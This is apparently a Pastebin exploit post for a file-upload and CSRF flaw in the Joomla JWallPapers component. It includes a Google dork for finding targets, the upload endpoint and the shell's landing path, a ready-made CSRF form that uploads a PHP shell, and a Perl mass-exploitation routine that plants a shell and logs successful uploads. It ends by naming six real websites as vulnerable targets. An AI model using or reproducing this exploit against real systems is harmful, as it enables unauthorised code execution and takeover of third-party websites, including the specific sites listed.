Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla JWallPapers Components 2.0.1 CSRF Shell Upload
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/02/2019
- # Vendor Homepage : joomla4ever.org
- # Software Download Link : joomla4ever.org/archive/ext/com_jwallpapers.zip
- # Software Information Link : joomla4ever.org/extensions/ext-jwallpapers
- # Software Affected Version : 1.1 - 1.3 - 1.4 - 1.6 and 2.0.1 ~ and all previous versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_jwallpapers''
- # Vulnerability Type : CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
- CWE-264 [ Permissions, Privileges, and Access Controls ]
- CWE-352 [ Cross-Site Request Forgery ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- JWallpapers - powerful and customizable gallery component for Joomla!
- With component, you can create a pretty good service at the show, loading or
- downloading of different graphic materials (wallpaper, screensaver for mob.
- Phones, photos, etc.) is present in component integration
- in Community Builder, support SEF components.
- ####################################################################
- # Impact :
- ***********
- This Software Joomla JWallPapers indicates an attack attempt to perform an
- Arbitrary File Upload vulnerability in Joomla Jwallpapers Plugin/Component.
- The vulnerability is due to a design flaw in the vulnerable application
- when handling a file upload request without authentication.
- A remote attacker may be able to exploit this to execute arbitrary code within
- the context of the application, by uploading an arbitrary file without any authentication.
- System Compromise: Remote attackers can gain control of vulnerable systems.
- ####################################################################
- # Arbitrary File Upload/Shell Upload Exploit :
- ***************************************
- /index.php?option=com_jwallpapers&task=upload
- # Vulnerability Error :
- ********************
- {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
- # Directory File Path :
- *******************
- /jwallpapers_files/plupload/[SHELLNAME.php;.gif]
- ####################################################################
- # CSRF Cross Site Request Forgery Exploiter :
- *******************************************
- <html>
- <body>
- <form method="post" action="http://VULNERABLESITE/index.php?option=com_jwallpapers&task=upload" enctype="multipart/form-data">
- <input type="file" name="file"/>
- <input type="hidden" name="name" value="shell_name.php" />
- <input type="submit" value="submit"/>
- </form>
- </body>
- </html>
- ####################################################################
- # Another Perl Exploiter Code :
- ***************************
- #!/usr/bin/perl
- sub comjwallpapers(){
- $ua = LWP::UserAgent->new(keep_alive => 1);
- $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
- $ua->timeout (30);
- $url ="$http://VULNERABLESITE/index.php?option=com_jwallpapers&task=upload";
- $comjwallpapersup= "$site/jwallpapers_files/plupload/kingskrupellos.php?X=Attacker";
- my $shell ="kingskrupellos.php";
- my $response = $ua->post( $url, Content_Type => "multipart/form-data", Content => [ file=>["$shell"] , submit=>"Upload" ]);
- $check = $ua->get($comjwallpapersup)->content;
- if ($check =~ /Cyberizm Digital Security Army/){
- print item(),"Com Jwallpapers";
- print color('bold white')," ................... ";
- print color('bold green'),"VULN\n";
- print item(),"Shell Uploaded Successfully\n";
- print color('bold white')," [Link] => $comjwallpapersup\n";
- open (TEXT, '>>Result/shells.txt');
- print TEXT "$comjwallpapersup\n";
- close (TEXT);
- }else{
- print item(),"Com Jwallpapers";
- print color('bold white')," ................... ";
- print color('bold red'),"NOT VULN\n";
- }
- }
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] robinevandooren.nl/index.php?option=com_jwallpapers&task=upload
- [+] safehousehabitats.com/intranet/index.php?option=com_jwallpapers&task=upload
- [+] mustangis.com/index.php?option=com_jwallpapers&task=upload
- [+] 1aphotoclub.com/index.php?option=com_jwallpapers&task=upload
- [+] zuohe.net/index.php?option=com_jwallpapers&task=upload
- [+] kulturgemeinde.at/index.php?option=com_jwallpapers&task=upload
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment